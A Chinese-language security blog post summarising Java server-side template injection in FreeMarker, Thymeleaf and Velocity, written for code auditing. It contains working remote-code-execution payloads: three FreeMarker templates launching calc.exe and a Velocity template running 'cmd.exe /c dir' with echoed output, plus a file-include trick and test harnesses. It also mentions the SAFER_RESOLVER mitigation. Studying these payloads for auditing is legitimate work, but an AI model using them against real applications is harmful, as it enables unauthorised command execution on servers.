Java模板注入总结

2021-07-31

前言

最近在做一个代码审计项目，听同事说以前这个项目被挖过java模板注入RCE漏洞。突然发现以前没接触过java模板注入这个漏洞类型，因此做一个总结。本文不关注漏洞产生原理，只关注怎么用。

容易出现java模板注入的三方组件

FreeMarker

测试代码:

package com.freemarker;

import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringWriter;
import java.util.HashMap;

public class freemarkerTest {
    public static void main(String args[]) throws IOException, TemplateException {
        Configuration configuration = new Configuration();
        String templateContent = "${1+1}";
        Template tpl = new Template(null, templateContent, configuration);
        StringWriter writer = new StringWriter();
        tpl.process(null, writer);
        System.out.println(writer);
    }
}

发现${1+1}为2说明ftl解析成功，当我们将templateContent设置为指定值的时候可以达成命令执行。

POC如下：

poc1:
    <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}
poc2:
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}
poc3:
<#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe")</@value>

简单解析一下以上的poc，拿下面的这个举例

1	<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

一直debug会发现，最终会调用到freemarker.template.utility.Execute类的exec方法，而入参则为[“calc.exe”]

写在<#assign value=”freemarker.template.utility.Execute”?new()>中的value有一个限制，即需要实现freemarker.template.TemplateModel，否则无法被实例化，如下图所示：

而当主动设置configuration.setNewBuiltinClassResolver(TemplateClassResolver.SAFER_RESOLVER);时，命令以上三个poc的均失效

可使用<#include>标签进行文件读取，不过此文件读取不能跨越根目录

1	<#include "1.txt"> 1.txt与src同目录

Thymeleaf

Themeleaf看https://github.com/veracode-research/spring-view-manipulation即可，作者这里不做重复劳动了，截个演示图：

Velocity

hellovelocity.vm 命令执行并回显poc

#set($x='')##

#set($rt=$x.class.forName('java.lang.Runtime'))##

#set($chr=$x.class.forName('java.lang.Character'))##

#set($str=$x.class.forName('java.lang.String'))##

#set($ex=$rt.getRuntime().exec('cmd.exe /c dir'))##

$ex.waitFor()

#set($out=$ex.getInputStream())##

#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

测试代码 (hellovelocity.vm放在编译好的.class的根目录)

package com.velocity;

import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.runtime.RuntimeConstants;
import org.apache.velocity.runtime.resource.loader.ClasspathResourceLoader;

import java.io.StringWriter;
import java.util.ArrayList;
import java.util.List;

public class Velocity {
    public static void main(String[] args) {
        // 初始化模板引擎
        VelocityEngine ve = new VelocityEngine();
        ve.setProperty(RuntimeConstants.RESOURCE_LOADER, "classpath");
        ve.setProperty("classpath.resource.loader.class", ClasspathResourceLoader.class.getName());
        ve.init();
        // 获取模板文件
        Template t = ve.getTemplate("hellovelocity.vm");
        // 设置变量
        VelocityContext ctx = new VelocityContext();
        ctx.put("name", "Velocity");
        List list = new ArrayList();
        list.add("1");
        list.add("2");
        ctx.put("list", list);
        // 输出
        StringWriter sw = new StringWriter();
        t.merge(ctx,sw);
        System.out.println(sw.toString());
    }
}

总结

之后代码审计之前可以先搜一下有无以上这些命令注入的jar包，如果有的话首先考虑能不能根据此进行利用。

以上三个项目的源码都放到github上了，整合为了一个项目，需要的可以下载下来进行测试：

https://github.com/flowerwind/javaSSTI